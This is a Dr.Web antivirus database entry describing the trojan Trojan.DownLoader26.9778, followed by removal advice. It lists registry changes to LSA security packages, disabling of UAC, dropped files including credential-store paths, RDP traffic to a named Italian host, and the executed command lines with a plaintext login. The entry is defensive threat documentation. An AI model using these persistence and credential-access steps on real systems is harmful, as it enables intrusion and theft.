Підтримка
Цілодобова підтримка | Правила звернення

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Поширені запитання |  Форум |  Бот самопідтримки Telegram

Ваші запити

  • Всі: -
  • Незакриті: -
  • Останій: -

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Зв'яжіться з нами Незакриті запити: 

Профіль

Профіль

Trojan.DownLoader26.9778

Добавлен в вирусную базу Dr.Web: 2018-01-11

Описание добавлено:

Technical Information

To ensure autorun and distribution:
Modifies the following registry keys:
  • [<HKLM>\SYSTEM\ControlSet001\Control\SecurityProviders] 'SecurityProviders' = 'msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, credssp.dll'
  • [<HKLM>\SYSTEM\ControlSet001\Control\Lsa] 'Security Packages' = 'kerberos\nmsv1_0\nschannel\nwdigest\ntspkg'
Malicious functions:
To complicate detection of its presence in the operating system,
blocks the following features:
  • User Account Control (UAC)
Modifies file system:
Creates the following files:
  • %APPDATA%\RDP6\bkgscpink.bmp
  • %TEMP%\autB.tmp
  • %APPDATA%\RDP6\TsCredentials.exe
  • %TEMP%\autA.tmp
  • %APPDATA%\RDP6\bkgscblue.bmp
  • %TEMP%\aut9.tmp
  • %APPDATA%\RDP6\bkgscgreen.bmp
  • C:\webtmp\alreadyopen.ini
  • %TEMP%\~DF150E.tmp
  • %APPDATA%\RDP6\MyPDFprinting\alreadyprinted.ini
  • C:\webtmp\webprint.txt
  • %APPDATA%\RDP6\MyPDFprinting\clientenvironment.ini
  • %APPDATA%\Microsoft\Protect\CREDHIST
  • <LS_APPDATA>\Microsoft\Credentials\S-1-5-21-2052111302-484763869-725345543-1003\Credentials
  • %TEMP%\aut8.tmp
  • %TEMP%\aut3.tmp
  • %APPDATA%\RDP6\<File name>.txt
  • %TEMP%\aut4.tmp
  • %APPDATA%\RDP6\mstsc.exe
  • %TEMP%\aut1.tmp
  • %APPDATA%\RDP6\mstscax.dll
  • %TEMP%\aut2.tmp
  • %APPDATA%\RDP6\ico2.ico
  • %TEMP%\aut7.tmp
  • %APPDATA%\RDP6\bkgsc.bmp
  • %TEMP%\aut6.tmp
  • %APPDATA%\RDP6\ConnectionClient.exe
  • %TEMP%\aut5.tmp
  • %APPDATA%\RDP6\languk.ini
Deletes the following files:
  • %TEMP%\aut9.tmp
  • %TEMP%\aut8.tmp
  • %TEMP%\aut7.tmp
  • %APPDATA%\RDP6\bkgsc.bmp
  • %TEMP%\autB.tmp
  • %TEMP%\autA.tmp
  • %TEMP%\aut3.tmp
  • %TEMP%\aut2.tmp
  • %TEMP%\aut1.tmp
  • %TEMP%\aut6.tmp
  • %TEMP%\aut5.tmp
  • %TEMP%\aut4.tmp
Substitutes the following files:
  • %APPDATA%\RDP6\bkgsc.bmp
Network activity:
Connects to:
  • 'se##.#ddservice.it':3389
UDP:
  • DNS ASK se##.#ddservice.it
Miscellaneous:
Creates and executes the following:
  • '%APPDATA%\RDP6\TsCredentials.exe' sede.sddservice.it Diego diego
  • '%APPDATA%\RDP6\TsCredentials.exe' sede.sddservice.it /Delete
  • '%APPDATA%\RDP6\ConnectionClient.exe' -server sede.sddservice.it -user Diego -psw diego -color 24 -alttab 0 -printer off -com off -smartcard off -preview on -remoteapp off -seamless on -wallp green -disk on -smartsizing 0 -apppath ...

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке